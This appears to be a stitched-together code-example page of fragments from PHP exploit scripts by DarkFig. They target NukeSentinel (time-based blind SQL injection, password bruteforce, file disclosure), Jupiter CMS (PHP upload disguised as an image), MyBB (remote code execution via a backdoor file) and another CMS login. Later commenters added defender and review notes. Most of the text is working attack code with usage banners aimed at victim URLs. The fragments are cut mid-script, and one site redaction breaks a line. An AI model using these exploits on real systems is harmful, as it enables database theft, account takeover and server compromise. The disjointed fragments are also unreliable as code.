if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
예제 #17
파일: 3450.php 프로젝트: iusky/fullypwnd
#!/usr/bin/php
<?php 
# Hide E_NOTICE so absent options stay silent
error_reporting(E_ALL ^ E_NOTICE);
# Usage; -url is required
if ($argc < 3) {
    print "\n--  NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit  ---\n-----------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n  Usage: {$argv['0']} -url <> [Options]\n Params: -url       For example http://victim.com/phpnuke/ \nOptions: -prefix    Table prefix (default=nuke)\n         -debug     Debug mod activated (debug_ns.html)\n         -truetime  Server response time which returns true\n         -benchmark You can change the value used in benchmark()\n         -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/phpnuke/ -debug\n   Note: This exploit is based on the server response time\n         If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
    exit(1);
}
# Options (getparam() defined elsewhere; second argument presumably "required")
$url = getparam("url", 1);
# Defaults; getparam() is evaluated twice for each defaulted option
$tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke';
$debug = getparam("debug") != "" ? 1 : 0;
# Iteration count for the time-based (benchmark()) injection the usage text describes
$benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000';
$proxy = getparam("proxy");
$proxyauth = getparam("proxyauth");
# HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}
# debug() is defined elsewhere
if ($debug) {
    debug(1);
}
# NOTE(review): the `******` below is a redaction made by the hosting site, not
# valid PHP; the original presumably concatenated a call similar to the
# bruteforce('pwd') on the following line.
# Defender note: time-based blind injection shows up as many near-identical
# requests with unusually long response times; BENCHMARK()/SLEEP() in query
# logs are the server-side tell, and a prepared statement removes the cause.
print "\nUsername: "******"\nPassword: ";
bruteforce('pwd');
exit(0);
예제 #18
#
# Usage; -url and -victim are both required, so fewer than four argv entries means exit
if ($argc < 5) {
    print "\n  NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit\n------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n------------------------------------------------------------------\n  Usage: {$argv['0']} -url <url> -victim <username> [Opts]\nOptions: -isadmin   Is the victim an Admin (1) or a normal user (default=0) ?\n         -prefix    Table prefix (default=nuke)\n         -tid       If you have already used this sploit\n         -bf        You can precise how many hits we can try\n         -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd> \n------------------------------------------------------------------\n";
    exit(1);
}
# Options (getparam() defined elsewhere; second argument presumably "required")
$url = getparam('url', 1);
# http://localhost/php-nuke-7.9/html/
$login = getparam('victim', 1);
# Default   # Victim (root for example)
# Defaults; getparam() is evaluated twice for each defaulted option
$admin = getparam('isadmin') != '' ? getparam('isadmin') : 0;
$prfix = getparam('prefix') != '' ? getparam('prefix') : 'nuke';
$tid = getparam('tid') != '' ? getparam('tid') : 0;
$nbtst = getparam('bf') != '' ? getparam('bf') : 10000;   # max number of attempts (per the usage text)
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
# HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($authp) {
    $xpl->proxyauth($authp);
}
# +nukesentinel.php
# 49.  if($ab_config['disable_switch'] > 0) { return; }
# 414. if($ab_config['track_active'] == 1 AND !is_excluded($nsnst_const['remote_ip'])) {
# 458. $db->sql_query("INSERT INTO `".$prefix."_nsnst_tracked_ips` (`user_id`, `username`, `date`, `ip_addr`, `ip_long`, `page`,
#                     `user_agent`, `refered_from`, `x_forward_for`, `client_ip`, `remote_addr`, `remote_port`, `request_method`,
#                     `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."',
#                     '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
#                     '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
예제 #19
<?php

/*
Title:          Jupiter CMS 1.1.5 File Upload Vulnerability
Advisory ID:    12070214
Risk level:     High
Author:         DarkFig <*****@*****.**>
URL:            http://www.acid-root.new.fr/advisories/12070214.txt
*/
// Hide E_NOTICE
error_reporting(E_ALL ^ E_NOTICE);
// Hard-coded target. NOTE(review): the literal starts with a space, which ends
// up in every request URL built from it.
$url = ' http://localhost/jupiter/';
// HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent("Mozilla");
// Multipart POST to modules/emoticons.php: a .php file declared as image/jpeg
// whose body is a PHP echo (frmdt_* are presumably phpsploit constants).
// Defender note: check uploads by content and an extension allow-list, never by
// the client-declared Content-Type, and keep the emoticons directory free of
// script execution.
$arr = array(frmdt_url => $url . 'modules/emoticons.php', "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "<?php echo(iamontheserver); ?>"));
$xpl->formdata($arr);
// Fetch the file back from the emoticons directory and print the response;
// the echo's output (instead of the source) would mean the upload was executed
$xpl->get($url . 'images/emoticons/iamaphpfile.php');
print $xpl->getcontent();
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
예제 #20
# They did not correct the function (that was a choice ... a bad one) and they forgot to correct one (only one) SQL request.
# They must correct the problem at the source =)
#
# Usage; -url is required
if ($argc < 3) {
    print "\n---  MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit  ---\n-----------------------------------------------------------------------\nPHP conditions: none\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n  Usage: {$argv['0']} -url http://victim.com/ [Options]\n Params: -url       For example http://victim.com/myBB/\nOptions: -debug     Debug mod activated (debug_mybb.html)\n         -truetime  Server response time which returns true\n         -benchmark You can change the value used in benchmark()\n         -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd>\n   Note: If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
    exit(1);
}
# Options (getparam() defined elsewhere; second argument presumably "required")
$url = getparam('url', 1);
$debug = getparam('debug') != '' ? 1 : 0;
# Iteration count for the time-based (benchmark()) injection the usage text describes
$benchmark = getparam('benchmark') != '' ? getparam('benchmark') : '1000000';
# NOTE(review): these pass the (undefined) variables $proxy/$proxyauth instead
# of the option names 'proxy'/'proxyauth'; with E_NOTICE hidden, the documented
# -proxy/-proxyauth options are silently never read.
$proxy = getparam($proxy);
$proxyauth = getparam($proxyauth);
# Paths on the target used later in the file (not visible here)
$backdoor = 'uploads/avatars/backdoor.php';
# inc/cache/backdoor.php
$filetoed = 'index.lang.php';
# HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent('Firefox');
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}
# debug() is defined elsewhere
if ($debug) {
    debug(1);
}
# There is two solutions to be logged in as administrator.
#
# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
예제 #21
        exit("\n-{$param} parameter required");
    } else {
        return;
    }
}
// Options; per the tail of getparam() above, a second argument of 1 makes it
// exit with "-<param> parameter required" when the option is absent
$url = getparam("url", 1);
$login = getparam("login", 1);
$pass = getparam("pass", 1);
$email = getparam("email", 1);   // read here, used later in the file (not visible)
$file = getparam("file", 1);
$id = getparam("id");            // optional; resolved from the login response further down
// Local file to read; `@` hides the warning and a missing file yields false,
// which the strlen() test below reports as "don't exist"
$source = @file_get_contents($file);
if (strlen($source) < 2) {
    exit("{$file} don't exist.\n");
}
// HTTP client (phpsploit class, defined elsewhere). "/index.php?" is appended
// with a leading slash, so a $url that already ends in '/' produces '//'.
$xpl = new phpsploit();
$s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}");
//Cookies
// post() evidently returns the raw response including headers, since a
// Set-Cookie line is matched in it. "Logged in" = a PHPSESSID was issued and
// the login form is no longer present.
// Defender note: the script sets a cookie holding md5($pass), which suggests
// the target accepts it as proof of identity; that is a password-equivalent
// credential stored client-side. A random server-side session id plus
// password_hash() storage avoids it.
if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) {
    $xpl->addcookie("PHPSESSID", $phpsessid[1]);
    $xpl->addcookie("sql_pseudo", $login);
    $xpl->addcookie("sql_pass", md5($pass));
    $xpl->addcookie("auto", "off");
    print "[*] PHPSESSID : {$phpsessid['1']}\n";
} else {
    exit("[*] Can't log in\n");
}
//Id
if (!isset($id)) {
    preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member);
    $id = $id_member[1];
예제 #22
#
# SQL Injection --> File Disclosure
# May also work on other versions.
# Interesting exploit =)
#
# Usage; -url and -file are both required, so fewer than four argv entries means exit
if ($argc < 5) {
    print "\n  NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit\n------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated)\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n------------------------------------------------------------------\n  Usage: {$argv['0']} -url <url> -file <file> [Options]\nExample: {$argv['0']} -url http://www.victim.com/ -file config.php\nOptions: -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd> \n------------------------------------------------------------------\n";
    exit(1);
}
# Options (getparam() defined elsewhere; second argument presumably "required")
$url = getparam('url', 1);
# http://localhost/php-nuke-7.9/html/
$file = getparam('file', 1);
# config.php, admin/.htaccess
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
# HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($authp) {
    $xpl->proxyauth($authp);
}
# +nukesentinel.php
#
# 52. $nsnst_const['server_ip'] = get_server_ip();
# 53. $nsnst_const['client_ip'] = get_client_ip();
# 54. $nsnst_const['forward_ip'] = get_x_forwarded();
# 55. $nsnst_const['remote_addr'] = get_remote_addr();
# 56. $nsnst_const['remote_ip'] = get_ip(); // If $nsnst_const['client_ip'] return it, elseif $nsnst_const['forward_ip'] return it ...
#